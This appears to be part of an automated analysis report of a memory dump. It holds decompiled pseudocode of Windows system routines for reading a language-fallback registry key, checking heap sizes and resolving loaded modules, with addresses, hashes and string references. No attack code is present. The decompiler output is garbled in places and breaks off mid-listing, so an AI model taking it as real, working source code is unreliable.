                                                                                                        C-Code - Quality: 93%
                                                                                                        			E00ACE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00ACF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E00B095D0();
						}
						if(_t78 != 0) {
							L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E00B0FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E00B0BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E00B09600();
					if(_t97 < 0) {
						goto L6;
					}
					E00B0BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00ACF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E00B0BB40(_t83, _t102 + 0x24, _t78);
								if(L00AD43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E00B0BB40(_t84, _t102 + 0x24, _t94);
									if(L00AD43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                                        0x00ace620
                                                                                                        0x00ace628
                                                                                                        0x00ace62f
                                                                                                        0x00ace631
                                                                                                        0x00ace635
                                                                                                        0x00ace637
                                                                                                        0x00ace63e
                                                                                                        0x00b25503
                                                                                                        0x00b25503
                                                                                                        0x00ace64c
                                                                                                        0x00ace64c
                                                                                                        0x00ace651
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00ace661
                                                                                                        0x00ace665
                                                                                                        0x00b2542a
                                                                                                        0x00ace715
                                                                                                        0x00ace71a
                                                                                                        0x00ace71c
                                                                                                        0x00ace720
                                                                                                        0x00ace720
                                                                                                        0x00ace727
                                                                                                        0x00ace736
                                                                                                        0x00ace736
                                                                                                        0x00ace743
                                                                                                        0x00ace743
                                                                                                        0x00ace673
                                                                                                        0x00ace678
                                                                                                        0x00ace67d
                                                                                                        0x00ace682
                                                                                                        0x00ace685
                                                                                                        0x00ace692
                                                                                                        0x00ace69b
                                                                                                        0x00ace6a3
                                                                                                        0x00ace6ad
                                                                                                        0x00ace6b1
                                                                                                        0x00ace6b2
                                                                                                        0x00ace6bb
                                                                                                        0x00ace6bf
                                                                                                        0x00ace6c0
                                                                                                        0x00ace6c8
                                                                                                        0x00ace6cc
                                                                                                        0x00ace6d5
                                                                                                        0x00ace6d9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00ace6e5
                                                                                                        0x00ace6ea
                                                                                                        0x00ace6f9
                                                                                                        0x00ace70b
                                                                                                        0x00ace70f
                                                                                                        0x00b25439
                                                                                                        0x00b2545e
                                                                                                        0x00b2545e
                                                                                                        0x00000000
                                                                                                        0x00b2545e
                                                                                                        0x00b2543b
                                                                                                        0x00b2543e
                                                                                                        0x00b25440
                                                                                                        0x00b25445
                                                                                                        0x00b25472
                                                                                                        0x00b25475
                                                                                                        0x00b2548d
                                                                                                        0x00b25493
                                                                                                        0x00b254a9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b254ab
                                                                                                        0x00b254b4
                                                                                                        0x00b254bc
                                                                                                        0x00b254c8
                                                                                                        0x00b254de
                                                                                                        0x00b254fb
                                                                                                        0x00b254e0
                                                                                                        0x00b254e6
                                                                                                        0x00b254eb
                                                                                                        0x00b254eb
                                                                                                        0x00b254de
                                                                                                        0x00000000
                                                                                                        0x00b254bc
                                                                                                        0x00b25477
                                                                                                        0x00b2547a
                                                                                                        0x00b25480
                                                                                                        0x00b25483
                                                                                                        0x00b25486
                                                                                                        0x00b2548b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b2548b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b25447
                                                                                                        0x00b25447
                                                                                                        0x00b25447
                                                                                                        0x00b25447
                                                                                                        0x00b2544e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b25450
                                                                                                        0x00b25452
                                                                                                        0x00b25455
                                                                                                        0x00b2545a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b2545c
                                                                                                        0x00b2546a
                                                                                                        0x00b2546d
                                                                                                        0x00b2546f
                                                                                                        0x00000000
                                                                                                        0x00b2546f
                                                                                                        0x00ace70f

                                                                                                        Strings
                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00ACE68C
                                                                                                        • @, xrefs: 00ACE6C0
                                                                                                        • InstallLanguageFallback, xrefs: 00ACE6DB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                        • API String ID: 0-1757540487
                                                                                                        • Opcode ID: 484bf37dda66aecd3cbb383bda16d4911a83b75bb9f8fcdd146d42721e1f0359
                                                                                                        • Instruction ID: 13eade3693045181b553b0c4e4b4135ae36abb2c2d1030a655bda725573665d3
                                                                                                        • Opcode Fuzzy Hash: 484bf37dda66aecd3cbb383bda16d4911a83b75bb9f8fcdd146d42721e1f0359
                                                                                                        • Instruction Fuzzy Hash: D6517C725083559BC724EF64D480BABB3E8EF88714F0509AEF999E7240F734DD4487A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AEB8E4, Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 60%
                                                                                                        			E00AEB8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0xbb8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E00ACB150();
						} else {
							E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E00ACB150();
						__eflags =  *0xbb7bc8;
						if(__eflags == 0) {
							E00B82073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E00AEAB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                                                                                        0x00aeb8f0
                                                                                                        0x00aeb8f2
                                                                                                        0x00aeb8f4
                                                                                                        0x00b32c4e
                                                                                                        0x00b32c50
                                                                                                        0x00b32c56
                                                                                                        0x00b32c5c
                                                                                                        0x00b32c60
                                                                                                        0x00b32c7f
                                                                                                        0x00b32c84
                                                                                                        0x00b32c62
                                                                                                        0x00b32c77
                                                                                                        0x00b32c7c
                                                                                                        0x00b32c8a
                                                                                                        0x00b32c8f
                                                                                                        0x00b32c94
                                                                                                        0x00b32c9c
                                                                                                        0x00b32ca5
                                                                                                        0x00b32ca5
                                                                                                        0x00b32c9c
                                                                                                        0x00b32c50
                                                                                                        0x00aeb8fa
                                                                                                        0x00aeb902
                                                                                                        0x00aeb921
                                                                                                        0x00aeb921
                                                                                                        0x00aeb924
                                                                                                        0x00aeb924
                                                                                                        0x00aeb927
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00aeb929
                                                                                                        0x00aeb92b
                                                                                                        0x00aeb92d
                                                                                                        0x00aeb940
                                                                                                        0x00000000
                                                                                                        0x00aeb940
                                                                                                        0x00aeb932
                                                                                                        0x00aeb932
                                                                                                        0x00000000
                                                                                                        0x00aeb932
                                                                                                        0x00000000
                                                                                                        0x00aeb904
                                                                                                        0x00aeb904
                                                                                                        0x00aeb90a
                                                                                                        0x00aeb90c
                                                                                                        0x00aeb916
                                                                                                        0x00aeb919
                                                                                                        0x00aeb915
                                                                                                        0x00aeb915
                                                                                                        0x00aeb91b
                                                                                                        0x00aeb91b
                                                                                                        0x00000000
                                                                                                        0x00aeb910

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-2558761708
                                                                                                        • Opcode ID: 809217fa6668f2c572d13558226376fe0fec1e731d24128e6c8b2dfa457e8e22
                                                                                                        • Instruction ID: c4d4864e57480eb472f6aa88731cb34a1f9a19b531f0019c79eb3794a357a225
                                                                                                        • Opcode Fuzzy Hash: 809217fa6668f2c572d13558226376fe0fec1e731d24128e6c8b2dfa457e8e22
                                                                                                        • Instruction Fuzzy Hash: A61193317251419FDB28D726C499F3BB3B9EB40720F298169F14ACB392DB70DC44D6A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00ADD5E0, Relevance: 2.9, Strings: 2, Instructions: 353COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 87%
                                                                                                        			E00ADD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0xbbd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E00AD6600(0xbb52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0xbb7b9c; // 0x0
							_t281 = L00AE4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E00B0F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0xbb7b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0xbb7b8c; // 0x672a38
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E00AE2280(_t200, 0xbb84d8);
									_t277 =  *0xbb85f4; // 0x672f28
									_t351 =  *0xbb85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x672ec0
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E00ADFFB0(_t287, _t353, 0xbb84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E00B1CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E00AD6600(0xbb52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E00AD7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0xbbb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E00B4E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0xbb8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0xbbb1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0xbbb218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E00AE2280(_t250, 0xbb84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L00B03898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E00ADFFB0(_t293, _t353, 0xbb84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E00B037F5(_t353, 0);
																}
																E00B00413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E00AF9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E00AF02D6(_t174);
																}
																L00AE77F0( *0xbb7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E00AFC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L00ADEC7F(_t353);
										L00AF19B8(_t287, 0, _t353, 0);
										_t200 = E00ACF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0xbbb2f8 |  *0xbbb2fc) == 0 || ( *0xbbb2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E00B0B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0xbbb2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E00B76B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E00B76AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E00ADE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L00ADEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E00B09730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E00ADE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L00AD8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E00B03C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                                                                        0x00add5f2
                                                                                                        0x00add5f5
                                                                                                        0x00add5f5
                                                                                                        0x00add5fd
                                                                                                        0x00add600
                                                                                                        0x00add60a
                                                                                                        0x00add60d
                                                                                                        0x00add617
                                                                                                        0x00add61d
                                                                                                        0x00add627
                                                                                                        0x00add62e
                                                                                                        0x00add911
                                                                                                        0x00add913
                                                                                                        0x00000000
                                                                                                        0x00add919
                                                                                                        0x00add919
                                                                                                        0x00add919
                                                                                                        0x00add634
                                                                                                        0x00add634
                                                                                                        0x00add634
                                                                                                        0x00add634
                                                                                                        0x00add640
                                                                                                        0x00add8bf
                                                                                                        0x00000000
                                                                                                        0x00add646
                                                                                                        0x00add646
                                                                                                        0x00add64d
                                                                                                        0x00add652
